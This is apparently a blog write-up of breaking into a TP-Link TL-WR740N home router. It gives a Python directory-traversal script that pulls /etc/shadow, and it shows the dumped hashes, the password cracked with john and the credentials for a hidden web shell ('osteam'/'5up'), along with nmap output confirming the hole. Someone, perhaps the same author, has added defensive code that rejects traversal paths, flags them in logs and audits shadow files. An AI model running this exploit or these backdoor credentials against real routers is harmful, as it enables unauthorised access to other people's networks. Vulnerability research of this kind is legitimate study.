I have a TL-WR740N router (it is an old one) whose firmware I was trying to gain access to. I think it is OpenWRT, but nmap reports it as a TP-Link WAP… so I don't know (yet)! I scanned the ports hoping to find an open Telnet or SSH port (the ZTE router has its Telnet port open, by the way!!!) but they are closed. Here is my primary scan:
```
# nmap -sT 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds
```
So … I went to test the graphical interface (the web interface of the router at http://192.168.0.1/). Here is how the page looks:
A little about the interface: I checked the source code and found out that the webpage uses frame tags (a FRAMESET) to load the site content.
```html
<FRAMESET cols=160,55%,*>
  <FRAMESET rows=72,* frameSpacing=0 frameBorder=0>
    <FRAME name=productphoto marginWidth=0 marginHeight=0 src="/images/productphoto.gif" noResize scrolling=no>
    <FRAME name=bottomLeftFrame marginWidth=0 marginHeight=0 src="/userRpm/MenuRpm.htm" noResize>
  </FRAMESET>
  <FRAME name=mainFrame marginWidth=0 marginHeight=0 src="/userRpm/StatusRpm.htm" frameBorder=0>
  <FRAME name=helpFrame marginWidth=0 marginHeight=0 src="/help/StatusHelpRpm.htm" frameBorder=1>
</FRAMESET>
```
I made a list of the available directories/paths:
- root, http://192.168.0.1/ which is represented by ‘/’
- frames, http://192.168.0.1/frames/
- images, http://192.168.0.1/images/
- help, http://192.168.0.1/help/
- userRpm (whatever that is), http://192.168.0.1/userRpm/
So now I have to check for a directory traversal vulnerability (and I found one).
I don't know how many directories I need to jump back to reach the /etc/shadow file (or /etc/passwd), so I may have to test (using the hackbar plugin, maybe) a payload like this: http://192.168.0.1/images/../../../etc/shadow.
Something to notice here: urllib, which I used to download the HTML pages, will return an error "IOError: ('http protocol error', 0, 'got a bad status line', None)" and exit if the target URL is not … an HTML file (I think). I really don't care about this, as I personally don't use urllib anymore (I switched to mechanize a while ago), but… anyway (this is just a notice)!
My full script:
```python
import urllib
import time

depth = 5                      # how many "../" levels to try
host = 'http://192.168.0.1/'
path = '../'
target = 'etc/shadow'
fullpath = ''
directories = ['', 'frames/', 'images/', 'help/']

for i in range(1, depth):
    fullpath += path           # one more "../" per round
    for directory in directories:
        url = host + directory + fullpath + target
        print "Testing: ", url
        htmltext = ''          # reset so an earlier hit is not reported again
        try:
            htmltext = urllib.urlopen(url).read()
        except:
            pass               # non-HTML responses raise IOError (see the notice above)
        if "root" in htmltext:
            print url, " is vulnerable"
        else:
            time.sleep(2)
            continue
```
The program (more precisely urllib) will prompt for a username/password; the default username and password for the TL-WR740N router are admin/admin.
```
Testing:  http://192.168.0.1/../etc/shadow
Testing:  http://192.168.0.1/frames/../etc/shadow
Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin
Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1:
Testing:  http://192.168.0.1/images/../etc/shadow
Testing:  http://192.168.0.1/help/../etc/shadow
Testing:  http://192.168.0.1/../../etc/shadow
Testing:  http://192.168.0.1/frames/../../etc/shadow
http://192.168.0.1/frames/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/images/../../etc/shadow
http://192.168.0.1/images/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/help/../../etc/shadow
http://192.168.0.1/help/../../etc/shadow  is vulnerable
```
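The requests that succeeded above are exactly the ones a correctly written server would refuse: the one-level probes stay inside the document root, the two-level ones climb out of it. As an added example (not the author's script and not TP-Link code), here is the path resolution a hardened embedded web server should perform, plus a small scanner that flags such requests in access logs; the document root /web and the log lines are constructed assumptions, not taken from the router.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/web"  # assumed document root; not taken from the TP-Link firmware


def resolve_request_path(request_path, web_root=WEB_ROOT):
    """Percent-decode once, walk the segments, and refuse any path whose
    ".." climbs above the document root. Returns the filesystem path to
    serve, or None when the request must be rejected."""
    decoded = unquote(request_path)
    depth = 0
    for part in decoded.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return None  # /images/../../etc/shadow escapes the root
        elif part not in ("", "."):
            depth += 1
    # Paths that stay inside the root reach here; normpath collapses the
    # remaining "dir/.." pairs, so /frames/../etc/shadow becomes
    # /etc/shadow *inside* web_root, never the real /etc/shadow.
    normalised = posixpath.normpath("/" + decoded.lstrip("/"))
    return posixpath.join(web_root, normalised.lstrip("/"))


# Constructed common-log-format lines modelled on the probes above; sample
# data, not a capture from the router.
SAMPLE_LOG = [
    '192.168.0.100 - - [19/Jun/2014:00:40:01 +0300] "GET /userRpm/StatusRpm.htm HTTP/1.1" 200 5120',
    '192.168.0.100 - - [19/Jun/2014:00:41:12 +0300] "GET /images/../etc/shadow HTTP/1.1" 404 0',
    '192.168.0.100 - - [19/Jun/2014:00:41:14 +0300] "GET /images/../../etc/shadow HTTP/1.1" 200 812',
    '192.168.0.100 - - [19/Jun/2014:00:41:16 +0300] "GET /help/../../etc/shadow HTTP/1.1" 200 812',
    '192.168.0.100 - - [19/Jun/2014:00:41:18 +0300] "GET /help/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 640',
]


def flag_traversal_requests(log_lines):
    """Return the request paths that resolve_request_path() rejects: the
    lines a defender should treat as traversal attempts."""
    flagged = []
    for line in log_lines:
        try:
            request_path = line.split('"')[1].split()[1]  # "GET <path> HTTP/1.1"
        except IndexError:
            continue  # malformed line: skip rather than abort the scan
        if resolve_request_path(request_path) is None:
            flagged.append(request_path)
    return flagged
```

The scanner decodes percent-encoding once before checking, so the `%2e%2e` variant in the sample log is caught as well.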
So … if you run this script with the -i option (python -i) you end up in interactive mode (good for debugging), so I checked the value of htmltext, and what do you know:
```
>>> print htmltext
TL-WR740N //
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
```
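Beyond the root entry, the dump itself tells a defender several things. As an added example (not part of the original post), this Python 3 audit parses shadow-format entries, with a sample string copied from the dump above, and flags empty password fields, accounts sharing one identical hash, the legacy md5crypt scheme, and the empty salt in `$1$$`.

```python
SHADOW_SAMPLE = """\
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::
"""


def audit_shadow(text):
    """Parse shadow-format entries and report the weaknesses visible in the
    dump above: accounts whose password field is empty (no password at
    all), accounts sharing one identical hash (same salt and hash means the
    same password), hashes using the legacy md5crypt ($1$) scheme, and
    md5crypt hashes with an empty salt ($1$$...), which defeats per-user
    salting."""
    report = {"empty_password": [], "shared_hash": [],
              "md5crypt": [], "empty_salt": []}
    by_hash = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # not a shadow entry
        user, pw = fields[0], fields[1]
        if pw == "":
            report["empty_password"].append(user)
        elif pw.startswith(("*", "!")):
            continue  # locked or disabled: no password login possible
        else:
            by_hash.setdefault(pw, []).append(user)
            if pw.startswith("$1$"):
                report["md5crypt"].append(user)
                # md5crypt layout is $1$<salt>$<hash>; split("$")[2] is the salt
                if pw.split("$")[2] == "":
                    report["empty_salt"].append(user)
    report["shared_hash"] = [u for u in by_hash.values() if len(u) > 1]
    return report
```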
Not bad so far! So now what?
I copied the line that has the root account in it to a file, named it root.password, and used john:
```
john --show root.password
```
I got the password: it is 5up (the default password, I guess).
Anyway… now what? (this is REALLY interesting)
Well… I did my research, and this is what I found:
Some TP-Link routers have a hidden web shell that you can access using this URL:
The username is osteam and the password is 5up. Here is how this interface looks:
And there is actually an nmap script to test for this vulnerability in TP-Link routers:
```
nmap -p80 --script http-tplink-dir-traversal -Pn -n 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST
Nmap scan report for 192.168.0.1
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited without authenticatication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds
```
By the way… I mirrored the website using webhttrack (httrack) but I didn't get anything interesting… but when using the web shell, I went to the web directory and there is a folder named "userRpm" where I found lots of interesting files. I am still digging into this router (I want to see if I can upload a file or add new commands, maybe!)
TL-WR740N routers are common here where I live (and in Mexico as well), and they are not secured… in fact, you should be careful with the router you are using and double-check and test it for security.
[note]: this is a VERY interesting video about hacking routers (I applied that method on a ZTE router and got great results)